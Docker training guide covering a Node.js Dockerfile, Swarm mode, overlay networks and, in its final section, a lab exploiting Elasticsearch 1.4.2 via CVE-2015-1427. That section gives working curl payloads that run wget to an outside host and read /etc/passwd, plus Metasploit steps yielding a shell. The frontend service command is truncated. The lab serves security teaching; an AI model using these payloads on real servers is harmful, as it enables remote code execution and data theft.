357 Scenarios v1.0

The document provides steps to deploy a Node.js and Express.js application as a Docker container using Docker Swarm for orchestration. It describes creating a Dockerfile to define the application image, building the image, running a container from the image locally, initializing a Docker Swarm cluster on one node, joining additional nodes to the cluster, creating an overlay network for container communication across nodes, and deploying the application as a replicated service on the Swarm cluster.


Docker Training and Certification www.edureka.co/docker-training

Docker - Scenarios

A step by step guide

© Brain4ce Education Solutions Pvt. Ltd.


Step by Step Guide www.edureka.co/docker-training

1. Deploying Node.js and Express.js as a Docker Container

In this scenario, you'll learn how to deploy a Node.js web application with Express.js as a
Docker Container.

Step 1 - Dockerfile - Base Image


To run an application inside of a container you first need to build the Docker Image. The
Docker Image should contain everything required to start your application, including
dependencies and configuration.
Docker Images are created based on a Dockerfile. A Dockerfile is a list of instructions that
define how to build and start your application. During the build phase, these instructions are
executed. The Dockerfile allows image creation to be automated, repeatable and consistent.
The first part of a Dockerfile defines the base image. Docker follows an embrace-and-extend approach: your Dockerfile should only describe the steps required for your application. All runtime dependencies, such as Node.js, should come from the base image. The use of base images improves the build time and allows the base image to be shared across multiple projects.

Task
Start writing the Dockerfile by defining the base image in the editor.
FROM ocelotuproar/alpine-node:5.7.1

Step 2 - Dockerfile – Dependencies


The next stage of the Dockerfile is to define the dependencies the application requires to
start.
The RUN instruction executes the command, similar to launching it from the bash command
line. The WORKDIR instruction defines the working directory where commands should be
executed from. The COPY instruction copies files and directories from the build directory
into the container image. This is used to copy the source code into the image, allowing the
build to take place inside the image itself.
All the commands are run in order. Under the covers, Docker is starting the container,
running the commands, and then saving the image for the next command.

©Brain4ce Education Solutions Pvt. Ltd Page 1



Task
Continue creating the Dockerfile by defining the directory and how to download and
configure the dependencies.
RUN mkdir -p /usr/src/app
WORKDIR /usr/src/app

COPY package.json /usr/src/app/


RUN npm install

Step 3 - Dockerfile – Application


Once the Dockerfile has the required dependencies, it needs to define how to build and
run your application.
The EXPOSE instruction documents which ports the application listens on. This helps
describe how the application should be started and run in production, and can be
considered part of the documentation, or metadata, of the image and application.
The CMD instruction defines the default command to run when the Docker Container is
started. This can be overridden when starting the container.

Task
Finish the Dockerfile by copying the application source into the image, exposing the
port and defining the default start command.
COPY . /usr/src/app
EXPOSE 3000
CMD [ "npm", "start" ]
cat package.json
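Putting Steps 1-3 together, the complete Dockerfile reads as follows (assembled verbatim from the instructions above; only the comments are added):

```dockerfile
# Base image providing the Node.js runtime
FROM ocelotuproar/alpine-node:5.7.1

# Create and switch to the application directory
RUN mkdir -p /usr/src/app
WORKDIR /usr/src/app

# Copy package.json and install dependencies first,
# so this layer is cached between builds when only source changes
COPY package.json /usr/src/app/
RUN npm install

# Copy the application source and document the listening port
COPY . /usr/src/app
EXPOSE 3000

# Default command executed when the container starts
CMD [ "npm", "start" ]
```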

Step 4 - Build
With the Dockerfile created, you can use the Docker CLI to build the image.

Task
Create a Docker Image by building and executing the Dockerfile using the Docker CLI.
When creating the image we also define a friendly name and tag. The name should refer to
the application, in this case nodejs-app. The tag is a string commonly used as a version
number, in this case v0.1.
docker build -t nodejs-app:v0.1 .

You can view the Docker Images on your host using docker images | head -n2
Try breaking the build and see what happens.




Step 5 – Run
Once the Docker Image has been built, you can launch it in the same way as other
Docker Images.

Task
Start the newly built image and expose port 3000 so the web application can be
accessed.
docker run -d -t -p 3000:3000 --name app nodejs-app:v0.1

Once the container and its process have started, you can use curl to access the running
application.
You can view the application logs using docker logs app
curl http://docker:3000

You've now successfully built a Node.js application as a Docker Image.




2. Docker Orchestration - Getting Started with Swarm Mode
In this scenario, you will learn how to initialise a Docker Swarm Mode cluster and deploy
networked containers using the built-in Docker Orchestration.

Docker Swarm Mode introduces three new concepts which we'll explore in this scenario.

• Node: A Node is an instance of the Docker Engine connected to the Swarm.
Nodes are either managers or workers. Managers schedule which containers run
where; workers execute the tasks. By default, managers are also workers.
• Services: A service is a high-level concept relating to a collection of tasks to be
executed by workers. An example of a service is an HTTP server running as a
Docker Container on three nodes.
• Load Balancing: Docker includes a load balancer to distribute requests across all
containers in the service.




Step 1 - Initialise Swarm Mode

By default, Docker works as an isolated single-node engine: all containers are deployed
onto that engine alone. Swarm Mode turns it into a multi-host, cluster-aware engine.
The first node to initialise Swarm Mode becomes the manager. As new nodes join the
cluster, their roles can be adjusted between manager and worker. You should run three
to five managers in a production environment to ensure high availability.

Task: Create Swarm Mode Cluster


Swarm Mode is built into the Docker CLI. You can find an overview of the available
commands via docker swarm --help
The most important one is how to initialise Swarm Mode. Initialisation is done via init.
docker swarm init

After running the command, the Docker Engine knows how to work as part of a cluster and
becomes the manager. The result of initialisation is a token used to add additional
nodes in a secure fashion. Keep this token safe and secure for future use when scaling your
cluster.
In the next step, we will add more nodes and deploy containers across these hosts.

Step 2 - Join Cluster


With Swarm Mode enabled, it is possible to add additional nodes and issue commands
across all of them. If nodes happen to disappear, for example because of a crash, the
containers which were running on those hosts are automatically rescheduled onto other
available nodes. This rescheduling ensures you do not lose capacity and provides high
availability.
On each additional node you wish to add to the cluster, use the Docker CLI to join the
existing group. Joining is done by pointing the other host to a current manager of the cluster;
in this case, the first host.
Docker now uses an additional port, 2377, for managing the Swarm. The port should be
blocked from public access and only accessed by trusted users and nodes. We recommend
using VPNs or private networks to secure access.




Task
The first task is to obtain the token required to add a worker to the cluster. For demonstration
purposes, we'll ask the manager what the token is via swarm join-token. In production, this
token should be stored securely and only be accessible to trusted individuals.
token=$(docker -H 172.17.0.31:2345 swarm join-token -q worker) && echo $token

On the second host, join the cluster by requesting access via the manager. The token is
provided as an additional parameter.
docker swarm join 172.17.0.31:2377 --token $token

By default, the manager will automatically accept new nodes being added to the cluster.
You can view all nodes in the cluster using docker node ls

Step 3 - Create Overlay Network


Swarm Mode also introduces an improved networking model. In previous versions, Docker
required the use of an external key-value store, such as Consul, to ensure consistency
across the network. The need for consensus and KV has now been incorporated internally
into Docker and no longer depends on external services.
The improved networking approach follows the same syntax as before.
The overlay network is used to enable containers on different hosts to communicate. Under
the covers, this is a Virtual Extensible LAN (VXLAN), designed for large scale cloud based
deployments.

Task
The following command will create a new overlay network called skynet. All containers
registered to this network can communicate with each other, regardless of which node they
are deployed onto.
docker network create -d overlay skynet




Step 4 - Deploy Service


By default, Docker uses a spread replication model for deciding which containers should run
on which hosts. The spread approach ensures that containers are deployed across the
cluster evenly. Should one of the nodes be removed from the cluster, the containers it was
running are spread across the other available nodes.
A new concept of Services is used to run containers across the cluster. This is a higher-level
concept than containers. A service allows you to define how applications should be
deployed at scale. By updating the service, Docker updates the containers required in a
managed way.

Task
In this case, we are deploying the Docker Image katacoda/docker-http-server. We define
a friendly service name of http and attach the service to the newly created skynet
network.
To ensure replication and availability, we run two instances, or replicas, of the
container across our cluster.
Finally, we load balance these two containers together on port 80. An HTTP request
sent to any of the nodes in the cluster will be processed by one of the containers
within the cluster. The node which accepted the request might not be the node where the
responding container is running; instead, Docker load-balances requests across all
available containers.
docker service create --name http --network skynet --replicas 2 -p 80:80 katacoda/docker-http-server

You can view the services running on the cluster using the CLI command docker service ls
As containers are started you will see them using the ps command. You should see one
instance of the container on each host.
List containers on the first host - docker ps
List containers on the second host - docker ps
If we issue an HTTP request to the public port, it will be processed by one of the two
containers: curl docker




Step 5 - Inspect State


The Service concept allows you to inspect the health and state of your cluster and the
running applications.

Task
You can view the list of all the tasks associated with a service across the cluster; in this
case, each task is a container: docker service ps http
You can view the details and configuration of a service via docker service inspect --pretty http

On each node, you can ask what tasks it is currently running. Here self refers to the
manager (Leader) node: docker node ps self
Using the ID of a node you can query individual hosts: docker node ps $(docker node ls -q |
head -n1)

In the next step, we will scale the service to run more instances of the container.

Step 6 - Scale Service


A Service allows us to scale how many instances of a task are running across the cluster. As
Swarm understands how to launch containers and which containers are running, it can easily
start, or remove, containers as required. At the moment the scaling is manual, but the
API could be hooked up to an external system such as a metrics dashboard.

Task
At present, we have two load-balanced containers running which are processing our
requests: curl docker
The command below will scale our http service to be running across five containers.
docker service scale http=5

On each host, you will see additional containers being started: docker ps
The load balancer will automatically be updated. Requests will now be processed across the
new containers. Try issuing more requests via curl docker
The result of this scenario is a two-node Swarm Mode cluster which can run load-balanced
containers that can be scaled up and down.




3. Docker Orchestration - Create Overlay Network


Learn how to use Overlay Networks as part of Swarm Mode. Overlay networks allow
containers to communicate as if they were on the same host. Under the covers they use the
VXLAN features of the Linux Kernel.

Step 1 - Initialise Swarm Mode


By default, Docker works as an isolated single-node. All containers are only deployed onto
the engine. Swarm Mode turns it into a multi-host cluster-aware engine.

Task: Initialise Swarm Mode


To use overlay networking, Docker has to be in "Swarm Mode". This is enabled
via docker swarm init

Join Swarm Mode


Execute the command below on the second host to add it as a worker to the cluster.
token=$(docker -H 172.17.0.18:2345 swarm join-token -q worker) && docker swarm join
172.17.0.18:2377 --token $token

Step 2 - Create Network


Overlay Networks are created using the Docker CLI, in a similar way to creating a bridge
network, but for connecting containers between hosts. When creating the network, a driver
type of overlay is used. When new services are deployed via Swarm Mode, they can utilise
this network, allowing containers to communicate.

Task
To create the Overlay Network, use the CLI and define the driver. Networks can only be
created via a Swarm Manager node. The network name will be app1-network.
docker network create -d overlay app1-network

All the networks can be viewed using:


docker network ls




Note: It's expected that the network does not appear on the worker nodes. The manager
node handles network creation and the services being deployed.
docker network ls

Step 3 - Deploy Backend


Once the network has been created, services can be deployed onto it and are able to
communicate with other containers on the network.

Task
The following will deploy a Redis service using the network. The name of the service will
be redis, which can be used for discovery via DNS.
docker service create --name redis --network app1-network redis:alpine

The next step will deploy a web app on a different node that will interact with Redis over the
network.

Step 4 - Deploy Frontend


With the overlay network and Redis deployed, it's now possible to deploy a Web App to use
Redis to persist data. The application is configured to look up Redis via DNS. The app is
configured to listen on port 3000, but the service will be exposed to the public on port 80.

Task
Create the new service with the command below:
docker service create \
  --network app1-network -p 80:3000 \
  --replicas 1 --name ap

With a two-node deployment, each container will be deployed onto a different host.
docker ps

They'll use the overlay network and DNS discovery to communicate.

Test
Sending an HTTP request will persist the IP of the client in Redis.
curl docker




4. Docker Security - Hack ElasticSearch container

Running applications vulnerable to security exploits can expose your system to hackers.
This could result in downtime, data loss or disclosure of important information, which can
have an irreversible impact on a company.
In this scenario, you'll see how easy it is for hackers to break into applications using curl
commands. The scenario uses an older version of Elasticsearch which was vulnerable to a
remote exploit, detailed in CVE-2015-1427.

Step 1 - Start Container


To start we'll launch a container running Elasticsearch 1.4.2 which we'll later exploit.

Task
Launch the container
docker run -d -p 9200:9200 --name es benhall/elasticsearch:1.4.2

Container Security
By default, Docker drops certain Linux capabilities and blocks syscalls to add a default level
of security. As a result, an attacker is isolated within the container and the host is protected
from certain attack angles a hacker might use.

Step 2 - Exploit Container


This particular exploit took advantage of the Elasticsearch search capabilities. In order for
the attack to work, it requires data.

Insert Data
Use cURL to add a record. ElasticSearch can take a minute to launch, so you may find it's
not listening yet.
curl -XPUT 'http://docker:9200/twitter/user/kimchy1' -d '{ "name" : "Shay Banon" }'




Exploit via CVE-2015-1427


With data inserted, we can now exploit the database. An empty instance is not vulnerable to
the problem.
This particular version of Elasticsearch (1.4.2) allowed Java code to be used as part of the
search. While whitelisting existed, there were other ways to gain access to the Java API
required to potentially cause damage.
In this case we're using Java to get access to the Operating System name.
curl http://docker:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript":
{"script":
"java.lang.Math.class.forName(\"java.lang.System\").getProperty(\"os.name\")"}}}'

This command makes external HTTP requests to download additional files. HTTPBin echoes
the result of the HTTP request, but this could instead download additional applications used
to launch further attacks.
curl http://docker:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript":
{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget
-O /tmp/testy http://httpbin.org/get\")"}}}'

Once the process has been started, we can read the file off disk.
curl http://docker:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript":
{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat
/tmp/testy\").getText()"}}}'

We can also read potentially sensitive files such as /etc/passwd.

curl http://docker:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript":
{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat
/etc/passwd\").getText()"}}}'

Because we're running inside a container this won't expose information from our host. This
default Docker security gives us huge advantages over running directly on the host.

Step 3 - Metasploit
The Metasploit Project is a computer security project that provides information about
security vulnerabilities and aids in penetration testing and IDS signature development.
Metasploit is a collection of exploits that can be used to test vulnerabilities.

Start Metasploit
docker run -it --link es:es --entrypoint bash benhall/metasploit

Fix launch script and start (it can take a few moments to initialise, create the database
schema and load the framework).
chmod +x start.sh && ./start.sh




Exploit ES via Metasploit


use exploit/multi/elasticsearch/search_groovy_script

set TARGET 0

set RHOST es

exploit

You have shell access to the ES container!


ls

ls /

In this scenario, we demonstrated how easy it can be for attackers to break into
applications running inside a container. By default, Docker's security protects the host
system and prevents exposing information such as SSH keys or passwords.
However, it also demonstrates that people still need to be aware of which version of software
they're running and the potential vulnerabilities it may contain. Docker's security gives
you a greater level of protection than running the process directly on the host, but there still
needs to be a strong security practice in place.

